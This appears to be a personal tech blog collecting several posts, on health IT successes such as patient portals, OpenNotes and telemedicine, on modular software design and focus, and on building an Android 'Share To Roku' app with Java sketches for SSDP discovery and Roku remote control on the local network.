Health IT: More I, less T

“USCDI vs. USCDI+ vs. EHI vs. HL7 FHIR US Core vs. IPA. Definitions, similarities, and differences as you understand them. Go!” —Anonymous, Twitter

I spent about a decade working in “Health Information Technology” — an industry that builds solutions for managing the flow of healthcare information. It’s a big tent that boasts one of the largest trade shows in the world and dozens of specialized venture funds. And it’s quite diverse, including electronic health records, consumer products, billing and cost management, image management, AI and analytics of every flavor you can imagine, and more. The money is huge, and the energy is huger.

Real world progress, on the other hand, is tough to come by. I’m not talking about health care generally. The tools of actual care keep rocketing forward; the rate limiter on tests and treatments seems only our ability to assess efficacy and safety fast enough. But in the HIT world, it’s mostly a lot of noise. The “best” exits are mostly acquisitions by huge insurance companies willing to try anything to squeak out a bit more margin.

That’s not to say there’s zero success. Pockets of awesome actually happen quite often; they just rarely make the jump from “promising pilot” to actual daily use at scale. There are many reasons for this, but primarily it comes down to workflow and economics. In our system today, nobody is incented to keep you well or to increase true efficiency. Providers get paid when they treat you, and insurance companies don’t know you long enough to really care about your long-term health. Crappy information management in healthcare simply isn’t a technology problem. But it’s an easy and fun hammer to keep pounding the table with. So we do.

But I’m certainly not the first genius to recognize this, and the world doesn’t need another cynical naysayer, so what am I doing here? After watching another stream of HIT technobabble clog up my Twitter feed this morning, I thought it might be helpful to call out four technologies that have actually made a real difference over the last few years. Perhaps we’ll see something in there that will help others find their way to a positive outcome. Or maybe not. Let’s give it a try.

A. Patient Portals

Everyone loves to hate on patient portals. I sure did during the time I spent trying to make HealthVault go. After all, most of us interact with at least a half dozen different providers and we’re supposed to just create accounts at all of them? And figure out which one to use when? And deal with their circa 1995 interfaces? Really?

Well, yeah. That’s pretty much how business works on the web. Businesses host websites where I can view my transaction history, pay bills, and contact customer support. A few folks might use aggregation services to create a single view of their finances or whatever, but most of us just muddle through, more-or-less happily, using a gaggle of different websites that don’t much talk to each other.

There were three big problems with patient portals a few years ago:

  1. They didn’t exist. Most providers had some third-party billing site where you could pay because, money. But that was it.
  2. When they did exist, they were hard to log into. You usually had to request an “activation code” at the front desk in person, and they rarely knew what you were talking about.
  3. When they did exist and you could log in, the staff didn’t use them. So secure messaging, for example, was pretty much a black hole.

Regulation fixed #1; time fixed #2; the pandemic fixed #3. And it turns out that patient portals today are pretty handy tools for interacting with your providers. Sure, they don’t provide a universal comprehensive view of our health. And sure, the interfaces seem to belong to a long ago era. But they’re there, they work, and they have made it demonstrably easier for us to manage care.

Takeaway: Sometimes, healthcare is more like other businesses than we care to admit.

B. Epic Community Connect & Care Everywhere

Epic is a boogeyman in the industry — an EHR juggernaut. Despite a multitude of options, fully a third of hospitals use Epic, and that percentage is much larger if you look at the biggest health systems in the country. It’s kind of insane.

It can easily cost hundreds of millions of dollars to install Epic. Institutions often have Epic consultants on site full time. And nobody loves the interface. So what is going on here? Well, mostly Epic is just really good at making life bearable for CIOs and their IT departments. They take care of everything, as long as you just keep sending them checks. They are extremely paternalistic about how their software can be used, and as upside-down as that seems, healthcare loves it. Great for Epic. Less so for providers and patients, except for two things:

“Community Connect” is an Epic program that allows customers to “sublet” seats in their Epic installation to smaller providers. Since docs are basically required to have an EHR now (thanks regulation), this ends up being a no-brainer value proposition for folks that don’t have the IT savvy (or interest) to buy and deploy something themselves. Plus it helps the original customer offset their own cost a bit.

Because providers are using the same system here, data sharing becomes the default versus the exception. It’s harder not to share! And even non-affiliated Epic users can connect by enabling “Care Everywhere,” a global network run by Epic just for Epic customers. Thanks to these two things, if you’re served by the 33%+ of the industry that uses Epic, sharing images and labs and history is just happening like magic. Today.

Takeaway: Data sharing works great in a monopoly.

C. OpenNotes

OpenNotes is one of those things that gives you a bit of optimism at a time when optimism can be tough to come by. Way back in 2010, three institutions (Beth Israel in MA, Geisinger in PA, and Harborview in WA) started a long-running experiment that gave patients completely unfettered access to their medical records. All the doctor’s notes, verbatim, with virtually no exception. This was considered incredibly radical at the time: patients wouldn’t understand the notes; they’d get scared and create more work for the providers; providers fearing lawsuits would self-censor important information; you name it.

But at the end of the study, none of that bad stuff happened. Instead, patients felt more informed and greatly preferred the primary data over generic “patient education” and dumbed-down summaries. Providers reported no extra work or legal challenges. It took a long time, but this wisdom finally made it into federal regulation last year. Patients now must be granted full access to their providers’ notes in electronic form at no charge.

In the last twelve months my wife had a significant knee surgery and my mom had a major operation on her lungs. In both cases, the provider’s notes were extraordinarily useful as we worked through recovery and assessed future risk. We are so much better educated than we would otherwise have been. An order of magnitude better than ever before.

Takeaway: Information already being generated by providers can power better care.

D. Telemedicine

It’s hard to admit anything good could have come out of a global pandemic, but I’m going to try. The adoption of telemedicine as part of standard care has been simply transformational. Urgent care options like Teladoc and Doctor on Demand (I’ve used both) make simple care for infections and viruses easy and non-disruptive. For years insurance providers refused “equal pay” for this type of encounter; it seems that they’ve finally decided that it can help their own bottom line.

Just as impactful, most “regular” docs and specialists have continued to provide virtual visits as an option alongside traditional face-to-face sessions. Consistent communication between patients and providers can make all the difference, especially in chronic care management. I’ve had more and better access to my GI specialists in the last few years than ever before.

It’s only quite recently that audio and video quality have gotten good enough to make telemedicine feel like “real” medicine. Thanks for making us push the envelope, COVID.

Takeaway: Better care and efficiency don’t have to be mutually exclusive.

So there we go. There are ways to make things better with technology, but you have to work within the context of reality, and they ain’t always that sexy. We don’t need more JSON or more standards or more jargon; we need more information and thoughtful integration. Just keep swimming!

Form and Function

I love reality TV about making stuff and solving problems. My family would say “to a fault.” Just a partial list of my favs:

I could easily spin a tangent about experiential archeology and the absolutely amazing Ruth Goodman, but I’ll be restrained about that (nope): Secrets of the Castle, Tudor Monastery Farm, Tales from the Green Valley, Edwardian Farm, Victorian Farm, Wartime Farm.

ANYWAY.

Recently I discovered that old Project Runway seasons are available on the Roku Channel, so I’ve been binging through them; just finished season fourteen (Ashley and Kelly FTW). At least once per year, the designers are asked to create a look for a large ready-to-wear retailer like JCPenney or JustFab or whatever. These are my favorites because it adds a super-interesting set of constraints to the challenge: is it unique while retaining mass appeal, can it be reproduced economically, will it read well in an online catalog, etc. This ends up being new for most of the participants, who think of themselves (legitimately) as “artists” and prefer to create fashion for fashion’s sake. Many of them have never created anything other than bespoke pieces and things often go hilariously off the rails as their work is judged against real world, economic criteria in addition to innovation and aesthetics. Especially because the judges themselves often aren’t able to express their own expectations clearly up front.

This vibe brings me back to software development in an enterprise setting (totally normal, right?). So many developers struggle to understand the context in which their work is judged. After all, we learned computer science from teachers for whom computer science itself is the end goal. We read about the cool new technologies being developed by tech giants like Facebook and Google and Amazon. All of our friends seem to be building microservices in the cloud using serverless backends and nosql map/reduce data stores leveraging deep learning and … whatever. So what does it mean to build yet another integration between System A and System B? What, in the end, is the point?

It turns out to be pretty simple:

  1. Does your software enable and accelerate business goals right now, and
  2. Does it require minimal investment to do the same in the future?

Amusingly, positive answers to both of these turn out to be pretty much 100% correlated not with “the shiniest new language” or “what Facebook is doing” but instead beautiful and elegant code. So that’s cool; just like a great dress created to sell online, successful enterprise code is exceptional both in form and function. Nice!

But as easy as these tests seem, they can be difficult to measure well. Enterprises are always awash in poorly-articulated requirements that all “need” to be ready yesterday. Becoming a slave to #1 can seem like the right thing — “we exist to serve the business” after all — but down that road lies darkness. You’ll write crappy code that doesn’t actually do what your users need anyways, breaks all the time and ultimately costs a ton in refactoring and lost credibility.

Alas, #2 alone doesn’t work either. You really have no idea what the future is going to look like, so you end up over-engineering into some super-generalized false utopian abstraction that surely costs more than it should to run and doesn’t do any one thing well. And it is true that if your business isn’t successful today it won’t exist tomorrow anyways.

It’s the combination that makes the magic. That push and pull of building something in the real world now, that can naturally evolve over time. That’s what great engineering is all about. And it primarily comes down to modularity. If you understand and independently execute the modules that make up your business, you can easily swap them in and out as needs change.

In fact, that’s why “microservices” get such play in the conversation these days — they are one way to help enforce separation of duties. But they’re just a tool, and you can create garbage in a microservice just as easily as you can in a monolith. And holy crap does that happen a lot. Technology is not the solution here … modular design can be implemented in any environment and any language.

  • Draw your business with boxes and arrows on one piece of paper.
  • Break down processes into independent components.
  • Identify the core data elements, where they are created and which processes need to know about them.
  • Describe the conversations between components.
  • Implement (build or buy) each “box” independently. In any language you want. In any environment that works for you.

Respect both form and function, knitting together a whole from independent pieces, and you are very likely to succeed. Just like the best designers on Project Runway. And the pottery show. And the baking one. And the knife-making one. And the …

Focus

OK, let’s see if I can actually get this thing written.

It’s a little hard to focus right now. We’re almost two weeks into life with Copper the shockingly cute cavapoo puppy. He’s a great little dude, and life is already better with him around. But holy crap, it’s like having a human baby again — except that I’m almost thirty years older, and Furry-Mc-Fur-Face doesn’t use diapers, so it seems like every ten minutes we’re headed outside to do his business. Apparently it’s super-important to provide positive reinforcement for this, so if you happen to see me in the back yard at 3am waxing poetic about pee and/or poop, well, yeah.

What’s interesting about my inability to focus (better explanation of this in a minute) is that it’s not like I don’t have blocks of open time in which I could get stuff done. Copper’s day is an endless cycle of (a) run around like crazy having fun; (b) fall down dead asleep; (c) go to the bathroom; (d) repeat — with a few meals jammed in between rounds. Those periods when he sleeps can be an hour or more long, so there’s certainly time in the day to be productive.

And yet, in at least one very specific way, I’m not. “Tasks” get done just fine. The dishes and clothes are clean. I take showers. I even mowed the lawn the other day. I’m caught up on most of my TV shows (BTW Gold Rush is back!). But when I sit down to do something that requires focus, it’s a lost cause. Why is that?

Things that require focus require me to hold a virtual model of the work in my head. For most of my life the primary example of this has been writing code. But it applies to anything that requires creation and creativity — woodworking, writing, art, all of that stuff. These models can be pretty complicated, with a bunch of interdependent and interrelated parts. An error in one bit of code can have non-obvious downstream effects in another; parallel operations can bump into each other and corrupt data; tiny changes in performance can easily compound into real problems.

IMNSHO, the ability to create, hold and manipulate these mental models is a non-negotiable requirement to be great at writing and debugging code. All of the noise around TDD, automated testing, scrums and pair programming, blah blah blah — that stuff might make an average coder more effective I suppose, but it can’t make them great. If you “walk” through your model step by step, playing out the results of the things that can go wrong, you just don’t write bugs. OK, that’s bullsh*t — of course you write bugs. But you write very few. Folks always give me crap for the lack of automated tests around my code, but I will go toe-to-toe with any of them on code quality — thirty years of bug databases say I’ll usually win.

The problem, of course, is that keeping a complex model alive requires an insane amount of focus. And focus (the cool kids and my friend Umesh call it flow state) requires a ton of energy. When I was just out of school I could stay in the zone for hours. No matter what was going on in the other parts of my life, I could drop into code and just write (best mental health therapy ever). But as the world kept coming at me, distractions made it increasingly difficult to get there. Kids and family of course, but work itself was much more problematic. As I advanced in my career, my day was punctuated with meetings and budgets and managing and investors and all kinds of stuff.

I loved all of that too (ok maybe not the meetings or budgets), but it meant I had smaller and smaller time windows in which to code. There is nothing more antithetical to focus than living an interrupt-driven existence. But I wasn’t going to quit coding, so it forced me to develop two behaviors — neither rocket science — that kept me writing code I was proud of:

1. Code in dedicated blocks of time.

Don’t multitask, and don’t try to squeeze in a few minutes between meetings. It takes time to establish a model, and it’s impossible to keep one alive while you’re responding to email or drive-by questions. Establish socially-acceptable cues to let people know when you need to be left alone — one thing I wish I’d done more for my teams is to set this up as an official practice. As an aside, this is why open offices are such horsesh*t for creative work — sometimes you just need a door.

2. Always finish finished.

This is actually the one bit of “agile” methodology that I don’t despise. Break up code into pieces that you can complete in one session. And I mean complete — all the error cases, all the edges, all of it. Whatever interface the code presents — an API, an object interface, a UX, whatever — should be complete when you let the model go and move on to something else. If you leave it halfway finished, the mental model you construct “next time” will be just ever so slightly different. And that’s where edges and errors get missed.

Finishing finished improves system architecture too — because it forces tight, compact modularity. For example, you can usually write a data access layer in one session, but might need to leave the cache for later. Keeping them separate means that you’ll test each more robustly and you’ll be in a position to replace one or the other as requirements morph over time. As an extra bonus, you get a bunch of extra endorphin hits, because really finishing a task just feels awesome.
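To make the data-access-versus-cache split concrete, here is a minimal Java sketch. Everything in it (ShowStore, InMemoryShowStore, CachingShowStore, and the show-title domain) is hypothetical and invented for illustration; the point is only that each piece can be finished in its own session and swapped later without touching the other.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;

/** Hypothetical contract: look up a show title by id. */
interface ShowStore {
    Optional<String> findTitle(int id);
}

/** Session one: the data access layer, complete on its own. */
final class InMemoryShowStore implements ShowStore {
    private final Map<Integer, String> rows = new HashMap<>();
    int reads = 0; // counts how often the backing store is actually hit

    void put(int id, String title) {
        rows.put(id, title);
    }

    @Override
    public Optional<String> findTitle(int id) {
        reads++;
        return Optional.ofNullable(rows.get(id));
    }
}

/** Session two: a cache that wraps any ShowStore without modifying it. */
final class CachingShowStore implements ShowStore {
    private final ShowStore inner;
    private final Map<Integer, Optional<String>> cache = new HashMap<>();

    CachingShowStore(ShowStore inner) {
        this.inner = inner;
    }

    @Override
    public Optional<String> findTitle(int id) {
        // computeIfAbsent only calls the inner store on a cache miss
        return cache.computeIfAbsent(id, inner::findTitle);
    }
}
```

Callers only ever see ShowStore, so wrapping the store with `new CachingShowStore(store)` (or removing the wrapper again) is a one-line change, and each class can be tested by itself.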

OK sure, sounds great. But remember my friend Copper? In just the few sessions I’ve taken to write this little post, he’s come by dozens of times to play or make a quick trip outside. And even when I’m not paying him active attention, part of my brain always has to be on alert. Sometimes, distractions become so intense that the reality is you just won’t be successful at creative work, because your brain simply won’t focus. It hurts to say that, but better to acknowledge it than to do a crap job. The good news is that these times are usually transient — Copper will only be a brand new puppy for a few weeks, and during that time I just have to live with lower productivity. It’s not the end of the world, so long as I understand what’s going on and plan for it.

If you’re a manager, you really need to be on the lookout for folks suffering from focus-killing situations. New babies, new houses or apartments, health problems, parent or relationship challenges, even socio-political issues can catch up with people before they themselves understand what’s going on. Watch for sudden changes in performance. Ask questions. Maybe they just need some help learning to compartmentalize and optimize their time. Or maybe they need you to lighten the load for a few weeks.

Don’t begrudge them that help! Supporting each other through challenging times forges bonds that pay back many times over. And besides, you’ll almost certainly need somebody to do the same for you someday. Pay it forward.

Share to Roku!

TLDR: if you watch TV on a Roku and have an Android phone, please give my new Share To Roku app a try! It’s currently in open testing; install it with this link on the web or this link on your Android device. The app is free, has no ads, saves no data and only makes network calls to Rokus on your local network. It acts as a simple remote, but much more usefully lets you “Share” show names from the web or other apps directly to the Roku search interface. I use it with TV Time and it has been working quite well so far — but I need broader real-world testing and would really appreciate your feedback.

Oh user interface development, how I hate you so. But my lack of experience with true mobile development has become increasingly annoying, and I really wanted an app to drive my Roku. So let’s jump back into the world of input events and user interface layouts and see if we can get comfy. Yeesh.

Share To Roku in a nutshell

I’ve talked about this before (here and here). My goal is to transition as smoothly as possible from finding a show on my phone (an Android, currently the Samsung Galaxy S21) to watching it on my TV. I keep my personal watchlist on an app called TV Time and that’s key, but I also want to be able to jump from a recommendation in email or a review on the web. So feature #1 is to create a “share target” that can accept messages from any app.

Armed with this inbound search text, the app will help the user select their Roku, ensure the TV power is on (if that particular Roku supports it), and forward the search. The app then will land on a page hosting controls to help navigate the last mile to the show (including a nice swipe-enabled directional pad that IMNSHO is way better than the official Roku app). This remote control functionality will also be accessible simply by running the app on its own. And that’s about it. Easy peasy!
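The wire protocol isn’t spelled out here. Assuming the app talks to Roku’s External Control Protocol (ECP), an HTTP API that I believe listens on port 8060, the “forward the search” and remote-control steps mostly reduce to building a few URLs and POSTing to them. The sketch below only builds the URLs; the class name RokuUrls, the port constant, and the endpoint paths are my assumptions and should be checked against Roku’s documentation and the actual source.

```java
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

/** Hypothetical helper that builds ECP-style URLs; it does no networking. */
final class RokuUrls {
    private static final int ECP_PORT = 8060; // assumed ECP port

    private RokuUrls() {}

    /** URL for a single remote-control key, e.g. "Select", "Home" or "PowerOn". */
    static String keypress(String host, String key) {
        return "http://" + host + ":" + ECP_PORT + "/keypress/" + key;
    }

    /** URL that opens the Roku search screen pre-filled with the keyword. */
    static String search(String host, String keyword) {
        // URLEncoder emits form encoding ('+' for spaces); use %20 instead.
        // A literal '+' in the keyword has already become %2B at this point.
        String encoded = URLEncoder.encode(keyword, StandardCharsets.UTF_8)
                .replace("+", "%20");
        return "http://" + host + ":" + ECP_PORT + "/search/browse?keyword=" + encoded;
    }
}
```

For example, `RokuUrls.search("192.168.1.20", "Gold Rush")` yields `http://192.168.1.20:8060/search/browse?keyword=Gold%20Rush`.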

All of the code for Share To Roku is up on github. I’ll do a final clean-up on the code once the testing period is over, but everything I’ve written here is free to use and adopt under an MIT license, so please take anything you find useful.

Android Studio and “Kotlin”

If you’ve worked with me before, you know that my favorite “IDE” is Emacs; I build stuff from the command line; and I debug using logs and jdb. But for better or worse, the only realistic way to build for Android is to at least mostly use Android Studio, a customized version of IntelliJ IDEA (you can just use IntelliJ too but that’s basically the same thing). AStudio generates a bunch of boilerplate code for even the simplest of apps, and encourages you to edit it all in this weird overlapping sometimes-textual-sometimes-graphical mode that at least in my experience generally ensures a messy final product. I’m not going to spend this whole article complaining about it, but it is pretty stifling.

Love me a million docked windows, three-deep toolbars and controls on every edge of the screen!

Google would also really prefer that you drop Java and instead use their trendy sort-of-language “Kotlin” to build Android apps. I’ve played this Java pre-compiler game before with Scala and Groovy, and all I can say is no thank you. I will never understand why people are so obsessed with turning code into a nest of side effects, just to avoid a few semicolons and brackets. At least for now they are grudgingly continuing to support Java development, so that’s where you’ll find me. On MY lawn, where I like it.

Android application basics

Components

The most important thing to understand about Android development is that you are not in charge of your process. There is no “main” and, while you get your own JVM in which to live, that process can come and go at pretty much any time. This makes sense — at least historically mobile devices have had to manage pretty limited memory and processing power, so the OS exerts a ton of control over the use of those resources. But it can be tricky when it comes to understanding state and threading in an app, and clearly a lot of bugs in the wild boil down to a lack of awareness here.

Instead of main, an Android app is effectively a big JAR that uses a manifest file to expose Component classes. The most common of these is an Activity, which effectively represents one user interface screen within the app. Other components include various types of background process; I’m going to ignore them here. Share to Roku exposes two Activities, one for choosing a Roku and one for the search and remote interface. Each activity derives from an Android base class that defines a set of well-known entrypoints, each of which is called at different points in the process lifecycle.

Tasks and the Back Stack

But before we dig into those, two other important concepts: tasks and the back stack. This can get wildly complicated, but the super-basics are this:

  • A “task” is a thing you’re doing on the device. Most commonly tasks are born by opening an app from the home screen.
  • Each task maintains a “stack” of activities (screens). When you navigate to a new screen (e.g., open an email from a list of emails) a new activity is added to the top of the stack. When you hit the back button, the current (top) activity is closed and you return to the previous one.
  • Mostly each task corresponds to an app — but not always. For example, when you are in Chrome and you “share” a show to my app, a new Share To Roku activity is added to the Chrome task. Tasks are not the same as JVM processes!
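The bullets above can be modeled in a few lines of plain Java. This is a toy, not Android code: TaskModel and the activity name “BrowserActivity” are made up for illustration, and the real back stack has many more rules (launch modes, task affinity and so on).

```java
import java.util.ArrayDeque;
import java.util.Deque;

/** Toy model of one Android task: a named stack of activity names. */
final class TaskModel {
    private final String name;
    private final Deque<String> backStack = new ArrayDeque<>();

    TaskModel(String name, String rootActivity) {
        this.name = name;
        backStack.push(rootActivity);
    }

    /** Navigating forward puts a new activity on top of the stack. */
    void start(String activity) {
        backStack.push(activity);
    }

    /** Back closes the top activity; returns the one revealed, or null if none remain. */
    String back() {
        backStack.poll();
        return backStack.peek();
    }

    String top() {
        return backStack.peek();
    }

    int depth() {
        return backStack.size();
    }

    String name() {
        return name;
    }
}
```

Sharing from the browser then looks like `chrome.start("ChooseRokuActivity")` on the Chrome task: the new screen sits on top of the browser’s stack, and two presses of back return the user to the page they shared from.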

Taken together, the general task/activity lifecycle starts to make sense:

  1. The user starts a new task by starting an app from the home screen.
  2. Android starts a JVM for that app and loads an instance of the class for the activity marked as MAIN/LAUNCHER in the manifest.
  3. The onCreate method of the activity is called.
  4. The user interacts with the UX. Maybe at some point they dip into another activity, in which case onPause/onResume and onStop/onStart are called as the new activity starts and finishes.
  5. When the activity is finished (the user hits the back button or closes the screen in some other way) the onDestroy method is called.
  6. When the system decides it’s a good time (e.g., to reduce memory usage), the JVM is shut down.

Of course, it’s not really that simple. For example, Android may just nuke your process at any time, without ever calling onDestroy — so you’ll need to put some thought into how and when to save persistent data. And depending on your configuration, existing activity instances may be “reused” (with a call to onNewIntent). But it’s a pretty good starting place.

Intents

Intents are the means by which users navigate between activities on an Android device. We’ve actually already seen an intent in action, in step #2 above — MAIN/LAUNCHER is a special intent that means “start this app from the beginning.” Intents are used for every activity-to-activity transition, whether that’s explicit (e.g., when an email app opens up a message details activity in response to a click in a message list) or implicit (e.g., when an app opens up a new, pre-populated text message without knowing which app the user has configured for SMS).

Share to Roku uses intents in both ways. Internally, after picking a Roku, ChooseRokuActivity.shareToRoku instantiates an intent to start the ShareToRokuActivity. Because that internal navigation is the only way to land on ShareToRokuActivity, its definition in the manifest sets the “exported” flag to false and doesn’t include any intent-filter elements.

Conversely, the entry for ChooseRokuActivity in the manifest sets “exported” to true and includes no fewer than three intent-filter elements. The first is our old friend MAIN/LAUNCHER, but the next two are more interesting. Both identify themselves as SEND/DEFAULT filters, which mark the activity as a target for the Android Sharesheet (which we all just know as “sharing” from one app to another). There are two of them because we are registering to handle both text and image content.

Wait, image content? This seems a little weird; surely we can’t send an image file to the Roku search API. That’s correct, but it turns out that when the TV Time app launches a SEND/DEFAULT intent, it registers the content type as an image. There is an image (a little thumbnail of the show), but there is also text included, which we use for the search. There isn’t a lot of consistency in the way applications prepare their content for sharing; I foresee a lot of app-specific parsing in my future if Share To Roku gets any real traction with users.

ChooseRokuActivity

OK, let’s look a little more closely at the activities that make up the app. ChooseRokuActivity (code / layout) is the first screen a user sees: a simple list of Rokus found on the local network. Once the user makes a selection here, control is passed to ShareToRokuActivity which we’ll cover next.

The list is a ListView, which gives me another opportunity to complain about modern development. Literally every UX system in the world has a control for simple displays of text-based lists. Android’s ListView is just this — a nice, simple control to which you attach an Adapter that holds the data. But the Android Gods really would rather you don’t use it. Instead, you’re supposed to use RecyclerView, a fine but much more complicated view. It’s great for large, dynamic lists, but way too much for most simple text-based UX lists. This kind of judgy noise just bugs me — an SDK should make common things as easy as possible. Sorry not sorry, I’m using the ListView. Anyways, the list is wrapped in a SwipeRefreshLayout which provides the gesture and feedback to refresh the list by pulling down.

The activity populates the list of Rokus using static methods in Roku.java. Discovery is performed by UDP broadcast in Ssdp.java, a stripped down version of the discovery classes I wrote about extensively in Anyone out there? Service discovery with SSDP, WSD, other acronyms. The Roku class maintains a static (threadsafe) list of the Rokus it finds, and only searches again when asked to manually refresh. This is one of those places where it’s important to be aware of the process lifecycle; the list is cached as long as our JVM remains alive and will be used in any task we end up in.
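For readers who haven’t seen SSDP, here is a rough Java sketch of the discovery exchange. It is not the Ssdp.java from the repo. It assumes the standard SSDP multicast address (239.255.255.250:1900) and the “roku:ecp” search target that I understand Rokus answer to; the class and method names are hypothetical.

```java
import java.io.IOException;
import java.net.DatagramPacket;
import java.net.DatagramSocket;
import java.net.InetAddress;
import java.net.SocketTimeoutException;
import java.nio.charset.StandardCharsets;
import java.util.LinkedHashSet;
import java.util.Optional;
import java.util.Set;

final class SsdpSketch {
    private SsdpSketch() {}

    /** Builds the M-SEARCH request text for the given search target. */
    static String buildSearch(String searchTarget, int maxWaitSeconds) {
        return "M-SEARCH * HTTP/1.1\r\n"
                + "HOST: 239.255.255.250:1900\r\n"
                + "MAN: \"ssdp:discover\"\r\n"
                + "MX: " + maxWaitSeconds + "\r\n"
                + "ST: " + searchTarget + "\r\n"
                + "\r\n";
    }

    /** Pulls the LOCATION header (the device's base URL) out of one reply. */
    static Optional<String> parseLocation(String response) {
        for (String line : response.split("\r\n")) {
            int colon = line.indexOf(':');
            if (colon > 0 && line.substring(0, colon).trim().equalsIgnoreCase("LOCATION")) {
                return Optional.of(line.substring(colon + 1).trim());
            }
        }
        return Optional.empty();
    }

    /** Sends one search and collects locations until no reply arrives for timeoutMs. */
    static Set<String> discover(int timeoutMs) throws IOException {
        Set<String> locations = new LinkedHashSet<>();
        byte[] request = buildSearch("roku:ecp", 2).getBytes(StandardCharsets.US_ASCII);
        try (DatagramSocket socket = new DatagramSocket()) {
            socket.setSoTimeout(timeoutMs);
            socket.send(new DatagramPacket(request, request.length,
                    InetAddress.getByName("239.255.255.250"), 1900));
            byte[] buffer = new byte[2048];
            while (true) {
                DatagramPacket reply = new DatagramPacket(buffer, buffer.length);
                try {
                    socket.receive(reply);
                } catch (SocketTimeoutException e) {
                    break; // quiet for timeoutMs: assume everyone has answered
                }
                String text = new String(reply.getData(), 0, reply.getLength(),
                        StandardCharsets.US_ASCII);
                parseLocation(text).ifPresent(locations::add);
            }
        }
        return locations;
    }
}
```

Because discover blocks on the network, on Android it would have to run off the UI thread, which is exactly the situation the next paragraphs deal with.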

Take a look at the code in initializeRokus and findRokus (called from onCreate). If we have a cache of Rokus, we populate it directly into the list for maximum responsiveness. If we don’t, we create an ActivityWorker instance that searches using a background thread. The trick here is that each JVM process has exactly one thread dedicated to managing all user interface interactions — only code running on that thread can touch the UX. So if another thread (e.g., our Roku search worker) needs to update user interface components (i.e., update the ListView), it needs help.

There are a TON of ways that people manage this; ActivityWorker is my solution. A caller implements an interface with two methods: doBackground is run on a background thread, and when that method completes, the code in doUx runs on the UI thread (thanks to Activity.runOnUiThread). These two methods can share member variables (e.g., the “rokus” set) without worrying about concurrency issues: a nice clean wrapper for a common-but-typically-messy situation.
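The same two-phase pattern can be sketched outside Android. This is not the ActivityWorker from the repo: WorkerSketch is a hypothetical stand-in, and a plain java.util.concurrent.Executor plays the role that Activity.runOnUiThread plays in the app, so the sketch runs on any JVM.

```java
import java.util.concurrent.Executor;

/** Hypothetical stand-in for the pattern: background work first, then a UI-thread callback. */
final class WorkerSketch {
    interface Task {
        void doBackground() throws Exception; // runs off the UI thread
        void doUx();                          // runs on the UI thread afterwards
    }

    private WorkerSketch() {}

    /** Starts the background phase and hands doUx to uiThread once it completes. */
    static Thread run(Task task, Executor uiThread) {
        Thread worker = new Thread(() -> {
            try {
                task.doBackground();
            } catch (Exception e) {
                // Sketch only: skip the UI step on failure; a real app would report it.
                return;
            }
            uiThread.execute(task::doUx);
        }, "worker");
        worker.start();
        return worker;
    }
}
```

Fields written in doBackground can be read safely in doUx because the hand-off happens only after the background phase finishes, and submitting work to an Executor establishes the needed ordering between the two threads. In an Activity, the Executor argument could simply be `this::runOnUiThread`.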

ShareToRokuActivity

The second activity (code / layout) has more UX going on, and I’ll admit that I appreciated the graphical layout tools in AStudio. Designing even a simple interface that squishes and stretches reasonably to fit on so many different device sizes can be a challenge. Hopefully I did an OK job, but testing with emulators only goes so far — we’ll see as I get a few more testers.

If the activity was started from a sharing operation, we pick up that inbound text as “extra” data that comes along with the Intent object (the data actually comes to us indirectly via ChooseRokuActivity, since that was the entry point). Dealing with this search text is definitely the most unpleasant part of the app, because it comes in totally random and often unhelpful forms. If Share To Roku is going to become a meaningfully useful tool I’m going to have to do some more investment here.

A rare rave from me — the Android Volley HTTP library (as used in Http.java) is just fantastic. It works asynchronously, but always makes its callback on the UX thread. That is, it does automatically what I had to do manually with ActivityWorker. Since most mobile apps are really just UX sitting atop some sort of HTTP API, this makes life really really easy. Love it!

The bulk of this activity is just buttons and lists that cause fire-and-forget calls to the Roku, except for the directional pad that takes up the center of the screen. CirclePad.java is a custom control (sorry, custom “View”) that lets the user click a center button and indicate direction with either clicks in the N-S-E-W regions or (way cooler) directional swipes. A long press on the control sends a backspace, which makes entering text on the TV a bit more pleasant. Building this control felt like a throwback to Windows 3.0 development. Set a clip region, draw some lines and circles and icons. The gesture recognition is simultaneously amazingly easy (love the “fling” handler) and oddly prehistoric (check out my manual identification of a “long” press).

Publishing to the Play store

Back in the mid 00’s I spent some time consulting for Microsoft on a project called Windows Marketplace (wow there is a Wikipedia article for everything). Marketplace was sponsored by the Windows marketing team as an attempt to highlight the (yes) shareware market, which had been basically decimated by cross-platform browser-based apps. It worked a lot like any other app store, with some nice features like secure backup of purchased license keys (still a thing with some software!!!). It served a useful role for a number of years — fun times with a neat set of people (looking at you Raj, Vikram, DeeDee, Paul, Matt and Susan) and excellent chaat in Emeryville.

Anyways, that experience gave me some insight into the challenges of running and monetizing a directory of apps developed by everyone from big companies to (hello) random individuals. Making sure the apps at least work some of the time and don’t contain viruses or some weirdo porn or whatever. It’s not easy — but Google and Apple have really done a shockingly great job. Setting up an account on the Play Console is pretty simple — I did have to upload an image of my official ID and pay a one-time $25 fee but that’s about it. The review process is painful because each cycle takes about three or four days and they often come back with pretty vague rejections. For example, “you have used a word you may not have the rights to use” … which word is, apparently, a secret? But I get it.

So anyways — my lovely little app is now available for testing. If you’ve got an Android device, please use the links below to give it a try. If you have an Apple device, I’m sorry for many reasons. I will definitely be doing some work to better manipulate inbound search strings to provide a better search result on the Roku. I’m a little torn as to whether I could just do that all in-app, or if I should publish an API that I can update more easily. Probably the latter, although that does create a dependency that I’m not super-crazy about. We’ll see.

Install the beta version of Share To Roku with this link on the web or this link on your Android device.

Anyone out there? Service discovery with SSDP, WSD, other acronyms.

Those few regular readers of this stuff may remember What should we watch tonight, in which I used the Roku API to build a little web app to manage my TV watchlist. Since then I’ve found TV Time, which is waaay better and even tells me how many days until the next season of Cobra Kai gets here (51 as of this writing). But what it doesn’t do is launch shows automatically on my TV, and yes I’m lazy enough to be annoyed by that. So I’ve been planning a companion app that will let me “share” shows directly to my Roku using the same API I used a few months ago.

This time, I’d like the app to auto-discover the TV, rather than asking the user to configure its IP address manually. Seems pretty basic — the Roku ECP API describes how it uses “Simple Service Discovery Protocol” to enable just that. But man, putting together a reliable implementation turned out to be a bear, and sent me tumbling down a rabbit hole of “service discovery” that was both fascinating and frankly a bit appalling.

Come with me down that rabbit hole, and let’s learn how those fancy home devices actually try to find each other. It’s nerd-tastic!

Can I get your number?

